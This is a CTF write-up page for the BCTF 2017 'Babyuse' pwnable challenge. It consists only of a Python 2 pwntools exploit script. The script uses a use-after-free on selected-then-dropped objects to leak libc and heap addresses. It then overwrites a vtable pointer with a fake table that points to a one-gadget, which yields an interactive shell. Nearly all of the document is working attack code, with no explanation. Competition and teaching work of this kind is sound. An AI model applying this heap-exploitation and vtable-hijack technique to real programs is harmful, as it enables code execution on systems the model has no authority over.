BCTF 2017 Babyuse — Pwnable/CTF — 2017. 12. 1. 13:51
Exploit ONLY
# Python 2 / pwntools session script from a CTF write-up: thin menu helpers
# for the local ./babyuse binary, followed by the scripted interaction.
from pwn import *
p=process("./babyuse")
elf=ELF("./babyuse")


def buy(gun,length,name):
    # Menu option 1: answers the prompts with gun id, length, then name.
    p.recvuntil('Exit')
    p.sendline("1")
    p.recvuntil('95')
    p.sendline(str(gun))
    p.recv(1024)
    p.sendline(str(length))
    p.recvuntil(':')
    p.sendline(name)


def select(idx):
    # Menu option 2: sends idx after the 'gun' prompt.
    p.recvuntil('Exit')
    p.sendline("2")
    p.recvuntil('gun')
    p.sendline(str(idx))


def list():
    # Menu option 3. NOTE(review): defined but never called in this script,
    # and the name shadows the builtin `list`.
    p.recvuntil('Exit')
    p.sendline("3")


def rename(idx,length,name):
    # Menu option 4: answers the prompts with idx, length, then name.
    p.recvuntil('Exit')
    p.sendline("4")
    p.recv(1024)
    p.sendline(str(idx))
    p.recvuntil(':')
    p.sendline(str(length))
    p.recvuntil(':')
    p.sendline(name)


def use():
    # Menu option 5: prints everything received up to 'gun '.
    p.recvuntil('Exit')
    p.sendline("5")
    print p.recvuntil('gun ')


def use_input(what):
    # Sends `what` once the 'menu' prompt has been seen.
    p.recvuntil('menu')
    p.sendline(str(what))


def drop(idx):
    # Menu option 6: sends idx after the 'delete:' prompt.
    p.recvuntil('Exit')
    p.sendline("6")
    p.recvuntil('delete:')
    p.sendline(str(idx))


# Scripted session. NOTE(review): the numeric constants below are offsets
# specific to the challenge's binary/libc build as given in the write-up;
# nothing on this page documents how they were derived.
buy(2,256,"AAAA")
buy(2,256,"BBBB")
select(0)
drop(0)
use()
main_arena = u32(p.recv(4)) - 0x38
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - 0x1b2768
one_shot = libc_base + 0x3ac69
print hex(main_arena)
print hex(libc_base)
print hex(malloc_hook)
print hex(one_shot)
use_input(4)
buy(2,40,"CCCC") #0
buy(2,40,"DDDD") #2
select(0)
drop(2)
drop(0)
#0,2 off 1 on
use()
heap = u32(p.recv(4))
heap_base = heap - 0x68
heap_vtable = heap_base + 0x250
heap_fake = heap_base + 0x148
use_input(4)
print hex(heap)
print hex(heap_base)
print hex(heap_vtable)
buy(1,40,"ZZZZ") #0
buy(1,256,p32(one_shot)) #2
select(0)
drop(0)
print "=========="
rename(1,15,p32(heap_vtable)+p32(heap_fake))
p.interactive()